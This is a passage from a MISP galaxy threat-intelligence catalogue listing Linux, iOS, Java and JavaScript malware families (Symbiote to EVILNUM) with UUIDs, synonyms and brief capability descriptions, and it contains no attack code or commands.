A malware capable of capturing credentials and enabling backdoor access, implemented as a userland rootkit. It uses three methods for hiding its network activity, by hooking and hijacking 1) fopen/fopen64, 2) eBPF, 3) a set of libpcap functions.

Internal MISP references

UUID 4339d876-768c-4cdf-941f-3f55a08aafca which can be used as unique global reference for Symbiote in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SysJoker (ELF)

Internal MISP references

UUID c4b681ec-f5b5-433a-9314-07e06f739ba2 which can be used as unique global reference for SysJoker (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sysrv-hello (ELF)

Cryptojacking botnet

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sysrv-hello (ELF).

Known Synonyms
`Sysrv`

Internal MISP references

UUID d471083a-c8e1-4d9b-907e-685c9a75c1f9 which can be used as unique global reference for Sysrv-hello (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TeamTNT

Since Fall 2019, Team TNT is a well known threat actor which targets *nix based systems and misconfigured Docker container environments. It has constantly evolved its capabilities for its cloud-based cryptojacking operations. They have shifted their focus on compromising Kubernetes Clusters.

Internal MISP references

UUID 24695f84-d3af-477e-92dd-c05c9536ebf5 which can be used as unique global reference for TeamTNT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TheMoon

Internal MISP references

UUID ed098719-797b-4cb3-a73c-65b6d08ebdfa which can be used as unique global reference for TheMoon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TNTbotinger

Internal MISP references

UUID 00319b53-e31c-4623-a3ac-9a18bc52bf36 which can be used as unique global reference for TNTbotinger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Torii

Internal MISP references

UUID a874575e-0ad7-464d-abb6-8f4b7964aa92 which can be used as unique global reference for Torii in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TripleCross

According to its author, TripleCross is a Linux eBPF rootkit that demonstrates the offensive capabilities of the eBPF technology.

Internal MISP references

UUID a462c60d-a7f9-4a05-aaa1-be415870310e which can be used as unique global reference for TripleCross in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Trump Bot

Internal MISP references

UUID feb6a5f6-32f9-447d-af9c-08e499457883 which can be used as unique global reference for Trump Bot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TSCookie

Internal MISP references

UUID 592f7cc6-1e07-4d83-8082-aef027e9f1e2 which can be used as unique global reference for TSCookie in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

tsh

Internal MISP references

UUID 95a07de2-0e17-48a7-b935-0c1c0c0e39af which can be used as unique global reference for tsh in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tsunami (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tsunami (ELF).

Known Synonyms
`Amnesia`
`Muhstik`
`Radiation`

Internal MISP references

UUID 21540126-d0bb-42ce-9b93-341fedb94cac which can be used as unique global reference for Tsunami (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Turla RAT

Internal MISP references

UUID 1b62a421-c0db-4425-bcb2-a4925d5d33e0 which can be used as unique global reference for Turla RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Umbreon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Umbreon.

Known Synonyms
`Espeon`

Internal MISP references

UUID 637000f7-4363-44e0-b795-9cfb7a3dc460 which can be used as unique global reference for Umbreon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified Linux 001

According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA: CVE-2019-10149. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.

Internal MISP references

UUID b5b59d9f-f9e2-4201-a017-f2bae0470808 which can be used as unique global reference for Unidentified Linux 001 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified ELF 004

Implant used by APT31 on compromised SOHO infrastructure, tries to camouflage as a tool ("unifi-video") related to Ubiquiti UniFi surveillance cameras.

Internal MISP references

UUID 44a57915-2ec0-476f-9f20-b11082f5b5a4 which can be used as unique global reference for Unidentified ELF 004 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 005 (Sidecopy)

Internal MISP references

UUID d49402b3-9f2a-4d9a-ae09-b1509da2e8fd which can be used as unique global reference for Unidentified 005 (Sidecopy) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified ELF 006 (Tox Backdoor)

Enables remote execution of scripts on a host, communicates via Tox.

Internal MISP references

UUID 61a36688-0a4f-4899-8b17-ca0d5ff7e800 which can be used as unique global reference for Unidentified ELF 006 (Tox Backdoor) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hive (Vault 8)

Internal MISP references

UUID 721fa6d1-da73-4dd4-9154-a60ff4607467 which can be used as unique global reference for Hive (Vault 8) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vermilion Strike (ELF)

Internal MISP references

UUID a4ded098-be7b-4852-adfd-8971ace583f1 which can be used as unique global reference for Vermilion Strike (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VPNFilter

Internal MISP references

UUID 5ad30da2-2645-4893-acd9-3f8e0fbb5500 which can be used as unique global reference for VPNFilter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WatchBog

According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C adresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.

Internal MISP references

UUID aa00d8c9-b479-4d05-9887-cd172a11cfc9 which can be used as unique global reference for WatchBog in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WellMail

Internal MISP references

UUID 93ffafbd-a8af-4164-b3ab-9b21e6d09232 which can be used as unique global reference for WellMail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

elf.wellmess

Internal MISP references

UUID b0046a6e-3b8b-45ad-a357-dabc46aba7de which can be used as unique global reference for elf.wellmess in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WHIRLPOOL

Internal MISP references

UUID be3a5211-45a8-496a-974f-6ef14f44af3d which can be used as unique global reference for WHIRLPOOL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WhiteRabbit

Internal MISP references

UUID 901b88e6-4759-4aa6-b4d1-9f7da53c2adf which can be used as unique global reference for WhiteRabbit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Winnti (ELF)

Internal MISP references

UUID d6c5211e-506d-415c-b886-0ced529399a1 which can be used as unique global reference for Winnti (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Wirenet (ELF)

Internal MISP references

UUID 47a8fedb-fd60-493a-9b7d-082bdb85621e which can be used as unique global reference for Wirenet (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-Agent (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (ELF).

Known Synonyms
`chopstick`
`fysbis`
`splm`

Internal MISP references

UUID a8404a31-968a-47e8-8434-533ceaf84c1f which can be used as unique global reference for X-Agent (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xanthe

Internal MISP references

UUID 55b4d75f-adcc-47df-81cf-6c93ccb54a56 which can be used as unique global reference for Xanthe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xaynnalc

Internal MISP references

UUID 32b95dc7-03a6-45ab-a991-466208dd92d2 which can be used as unique global reference for Xaynnalc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xbash

Internal MISP references

UUID ee54fc1e-c574-4836-8cdb-992ac38cef32 which can be used as unique global reference for Xbash in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

xdr33

According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.

Internal MISP references

UUID c7b1cc91-7464-436e-ac40-3b06c98400a5 which can be used as unique global reference for xdr33 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XOR DDoS

Linux DDoS C&C Malware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XOR DDoS.

Known Synonyms
`XORDDOS`

Internal MISP references

UUID 7f9df618-4bd1-44a1-ad88-e5930373aac4 which can be used as unique global reference for XOR DDoS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zergeca

Zergeca is a DDoS-botnet and backdoor written in Golang. It uses modified UPX for packing, with the magic number 0x30219101 instead of "UPX!". It is being distributed via weak telnet passwords and known vulnerabilities.

Internal MISP references

UUID a660eeda-910a-4df5-86ba-f17d8ac93c31 which can be used as unique global reference for Zergeca in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZeroBot

ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZeroBot.

Known Synonyms
`ZeroStresser`

Internal MISP references

UUID 458c583b-4353-4104-bee8-9e68cb77f151 which can be used as unique global reference for ZeroBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZHtrap

Internal MISP references

UUID d070ff73-ad14-4f6b-951f-1645009bdf80 which can be used as unique global reference for ZHtrap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zollard

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zollard.

Known Synonyms
`darlloz`

Internal MISP references

UUID 9218630d-0425-4b18-802c-447a9322990d which can be used as unique global reference for Zollard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZuoRAT

According to Black Lotus Labs, ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules).

Internal MISP references

UUID c4b0a7cd-b349-44a1-94ca-3d5a4ac288b2 which can be used as unique global reference for ZuoRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AutoCAD Downloader

Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AutoCAD Downloader.

Known Synonyms
`Acad.Bursted`
`Duxfas`

Internal MISP references

UUID fb22d876-c6b5-4634-a468-5857088d605c which can be used as unique global reference for AutoCAD Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

COOKIESNATCH

According to Google, this is a cookie stealer

Internal MISP references

UUID 1b2d02d7-aa83-4101-ab10-2767b59c9c75 which can be used as unique global reference for COOKIESNATCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DualToy (iOS)

Internal MISP references

UUID f7c1675f-b38a-4511-9ac4-6e475b3815e6 which can be used as unique global reference for DualToy (iOS) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GuiInject

Internal MISP references

UUID d9215579-eee0-4e50-9157-dba7c3214769 which can be used as unique global reference for GuiInject in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

lightSpy

Internal MISP references

UUID 8a1b524b-8fc9-4b1d-805d-c0407aff00d7 which can be used as unique global reference for lightSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Phenakite

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phenakite.

Known Synonyms
`Dakkatoni`

Internal MISP references

UUID 7ba7488c-b153-4949-8391-bcf6c4b057bd which can be used as unique global reference for Phenakite in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PoisonCarp

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PoisonCarp.

Known Synonyms
`INSOMNIA`

Internal MISP references

UUID 7982cc15-f884-40ca-8a82-a452b9c340c7 which can be used as unique global reference for PoisonCarp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Postlo

Internal MISP references

UUID 25bff9ad-20dc-4746-a174-e54fcdd8f0c1 which can be used as unique global reference for Postlo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TriangleDB

Internal MISP references

UUID 25754894-018b-4bed-aab6-c676fac23a77 which can be used as unique global reference for TriangleDB in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VALIDVICTOR

According to Google, this reconnaissance payload uses a profiling framework drawing canvas to identify the target’s exact iPhone model, a technique used by many other actors. The iPhone model is sent back to the C2 along with screen size, whether or not a touch screen is present, and a unique identifier per initial GET request (e.g., 1lwuzddaxoom5ylli37v90kj). The server replies with either an AES encrypted next stage or 0, indicating that no payload is available for this device. The payload makes another request to the exploit server with gcr=1 as a parameter to get the AES decryption key from the C2.

Internal MISP references

UUID 16c0e484-7d03-46f4-870a-297d5397d693 which can be used as unique global reference for VALIDVICTOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WireLurker (iOS)

The iOS malware that is installed over USB by osx.wirelurker

Internal MISP references

UUID bb340271-023c-4283-9d22-123317824a11 which can be used as unique global reference for WireLurker (iOS) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-Agent (iOS)

Internal MISP references

UUID 430b9f30-5e37-49c8-b4e7-21589f120d89 which can be used as unique global reference for X-Agent (iOS) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AdWind

Part of Malware-as-service platform Used as a generic name for Java-based RAT Functionality - collect general system and user information - terminate process -log keystroke -take screenshot and access webcam - steal cache password from local or web forms - download and execute Malware - modify registry - download components - Denial of Service attacks - Acquire VPN certificates

Initial infection vector 1. Email to JAR files attached 2. Malspam URL to downlaod the malware

Persistence - Runkey - HKCU\Software\Microsoft\Windows\current version\run

Hiding Uses attrib.exe

Notes on Adwind The malware is not known to be proxy aware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AdWind.

Known Synonyms
`AlienSpy`
`Frutas`
`JBifrost`
`JSocket`
`Sockrat`
`UNRECOM`

Internal MISP references

UUID 8eb9d4aa-257a-45eb-8c65-95c18500171c which can be used as unique global reference for AdWind in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Adzok

Internal MISP references

UUID 90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c which can be used as unique global reference for Adzok in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Banload

F-Secure observed Banload variants silently downloading malicious files from a remote server, then installing and executing the files.

Internal MISP references

UUID 30a61fa9-4bd1-427d-9382-ff7c33bd7043 which can be used as unique global reference for Banload in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Blue Banana RAT

Internal MISP references

UUID c51bbc9b-0906-4ac5-8026-d6b8b7b23e71 which can be used as unique global reference for Blue Banana RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CrossRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CrossRAT.

Known Synonyms
`Trupto`

Internal MISP references

UUID bae3a6c7-9e58-47f2-8749-a194675e1c84 which can be used as unique global reference for CrossRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DynamicRAT

DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DynamicRAT.

Known Synonyms
`DYNARAT`

Internal MISP references

UUID 28539c3d-89a4-4dd6-85f5-f4c95808c0b7 which can be used as unique global reference for DynamicRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EpicSplit RAT

EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string "packet" as a packet delimiter.

Internal MISP references

UUID 90b304a2-452a-4c74-ae8d-80d9ace881a4 which can be used as unique global reference for EpicSplit RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FEimea RAT

Internal MISP references

UUID 3724d5d0-860d-4d1e-92a1-0a7089ca2bb3 which can be used as unique global reference for FEimea RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IceRat

According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.

Internal MISP references

UUID ac83a481-2ab4-42c2-a8b6-a4aec96e1c4b which can be used as unique global reference for IceRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JavaDispCash

JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM's local application and the goal is to remotely control its operation. The malware's primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.

Internal MISP references

UUID 71286008-9794-4dcc-a571-164195390c39 which can be used as unique global reference for JavaDispCash in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JavaLocker

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular JavaLocker.

Known Synonyms
`JavaEncrypt Ransomware`

Internal MISP references

UUID 4bdddf41-8d5e-468d-905d-8c6667a5d47f which can be used as unique global reference for JavaLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

jRAT

jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular jRAT.

Known Synonyms
`Jacksbot`

Internal MISP references

UUID f2a9f583-b4dd-4669-8808-49c8bbacc376 which can be used as unique global reference for jRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

jSpy

Internal MISP references

UUID ff24997d-1f17-4f00-b9b8-b3392146540f which can be used as unique global reference for jSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mineping

DDoS for Minecraft servers.

Internal MISP references

UUID f3f38528-a8bf-496a-af46-7eb60a9ec6c3 which can be used as unique global reference for Mineping in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Octopus Scanner

Internal MISP references

UUID 8ae996fe-50bb-479b-925c-e6b1e51a9b40 which can be used as unique global reference for Octopus Scanner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pronsis Loader

According to TrustWave, this is a loader leveraging JPHP, which was observed fetching Latrodectus and Lumma.

Internal MISP references

UUID 80005653-bfbb-4a37-a8bf-87f8dc9e4047 which can be used as unique global reference for Pronsis Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Qarallax RAT

According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).

Internal MISP references

UUID e7852eb9-9de9-43d3-9f7e-3821f3b2bf41 which can be used as unique global reference for Qarallax RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Qealler

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Qealler.

Known Synonyms
`Pyrogenic Infostealer`

Internal MISP references

UUID d16a3a1f-e244-4715-a67f-61ba30901efb which can be used as unique global reference for Qealler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QRat

QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QRat.

Known Synonyms
`Quaverse RAT`

Internal MISP references

UUID ef385825-bfa1-4e8c-b368-522db78cf1bd which can be used as unique global reference for QRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ratty

Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.

Internal MISP references

UUID da032a95-b02a-4af2-b563-69f686653af4 which can be used as unique global reference for Ratty in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sorillus RAT

Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as "Tapt", asserts that the tool is able to collect the following information from its target: - HardwareID - Username - Country - Language - Webcam - Headless - Operating system - Client Version

Internal MISP references

UUID 80694785-aeb6-4e05-a3e8-cb972993d769 which can be used as unique global reference for Sorillus RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STRRAT

STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird.

Since Version 1.2 and above, STRRAT was infamous for its ransomware-like behavior of appending the file name extension .crimson to files. Version 1.5 is notably more obfuscated and modular than previous versions, but the backdoor functions mostly remain the same: collect browser passwords, run remote commands and PowerShell, log keystrokes, among others. Version 1.5 of STRRAT Malware includes a proper encryption routine, though currently pretty simple to revert.

Internal MISP references

UUID 6d1335d5-8351-4725-ad8a-07cabca4119e which can be used as unique global reference for STRRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SupremeBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SupremeBot.

Known Synonyms
`BlazeBot`

Internal MISP references

UUID 651e37e0-1bf8-4024-ac1e-e7bda42470b0 which can be used as unique global reference for SupremeBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Verblecon

This malware seems to be used for attacks installing cryptocurrency miners on infected machines. Other indicators leads to the assumption that attackers may also use this malware for other purposes (e.g. stealing access tokens for Discord chat app). Symantec describes this malware as complex and powerful: The malware is loaded as a server-side polymorphic JAR file.

Internal MISP references

UUID 793565b4-666b-47a4-b15b-de9c80c75a51 which can be used as unique global reference for Verblecon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VersaMem

According to Lumen, a web shell used by Volt Typhoon.

Internal MISP references

UUID eb15c0ec-108e-4082-a0c1-ea41345b7db7 which can be used as unique global reference for VersaMem in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AIRBREAK

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AIRBREAK.

Known Synonyms
`Orz`

Internal MISP references

UUID fd419da6-5c0d-461e-96ee-64397efac63b which can be used as unique global reference for AIRBREAK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bateleur

Internal MISP references

UUID fb75a753-24ba-4b58-b7ed-2e39b0c68c65 which can be used as unique global reference for Bateleur in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BeaverTail

BeaverTail is a JavaScript malware primarily distributed through NPM packages. It is designed for information theft and to load further stages of malware, specifically a multi-stage Python-based backdoor known as InvisibleFerret. BeaverTail targets cryptocurrency wallets and credit card information stored in the victim's web browsers. Its code is heavily obfuscated to evade detection. Threat actors can either upload malicious NPM packages containing BeaverTail to GitHub or inject BeaverTail code into legitimate NPM projects. Researchers have identified additional Windows and macOS variants, indicating that the BeaverTail malware family is likely still under development.

Internal MISP references

UUID da0fb7ce-d730-4ee8-bcc8-3da7eba8ad79 which can be used as unique global reference for BeaverTail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BELLHOP

• BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host(WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways: • Creating a Run key in the Registry • Creating a RunOnce key in the Registry • Creating a persistent named scheduled task • BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin.

Internal MISP references

UUID 7ebeb691-b979-4a88-94e1-dade780c6a7f which can be used as unique global reference for BELLHOP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CACTUSTORCH

According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.

Internal MISP references

UUID efbb5a7c-8c01-4aca-ac21-8dd614b256f7 which can be used as unique global reference for CACTUSTORCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChromeBack

GoSecure describes ChromeBack as a browser hijacker, redirecting traffic and serving advertisements to users.

Internal MISP references

UUID ec055670-4d25-4918-90c7-281fddf3a771 which can be used as unique global reference for ChromeBack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ClearFake

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. The malware leverages social engineering to trick the user into running a fake web browser update.

Internal MISP references

UUID 8899bc6f-62e1-4732-988a-d5d64a5cf9bd which can be used as unique global reference for ClearFake in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoNight

WebAssembly-based crpyto miner.

Internal MISP references

UUID faa19699-a884-4cd3-a307-36492c8ee77a which can be used as unique global reference for CryptoNight in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CukieGrab

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CukieGrab.

Known Synonyms
`Roblox Trade Assist`

Internal MISP references

UUID d47ca107-3e03-4c25-88f9-8156426b7f60 which can be used as unique global reference for CukieGrab in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkWatchman

Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA for C&C.

Internal MISP references

UUID 4baf5a22-7eec-4ad8-8780-23a351d9b5f5 which can be used as unique global reference for DarkWatchman in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DNSRat

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSRat.

Known Synonyms
`DNSbot`

Internal MISP references

UUID a4b40d48-e40b-47f2-8e30-72342231503e which can be used as unique global reference for DNSRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

doenerium

Open sourced javascript info stealer, with the capabilities of stealing crypto wallets, password, cookies and modify discord clients https://github.com/doener2323/doenerium

Internal MISP references

UUID dc446dbc-6f8a-48ee-9e90-10e679a003e1 which can be used as unique global reference for doenerium in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Enrume

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Enrume.

Known Synonyms
`Ransom32`

Internal MISP references

UUID d6e5f6b7-cafb-476d-958c-72debdabe013 which can be used as unique global reference for Enrume in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EVILNUM (Javascript)

According proofpoint, EvilNum is a backdoor that can be used for data theft or to load additional payloads. The malware includes multiple interesting components to evade detection and modify infection paths based on identified antivirus software.

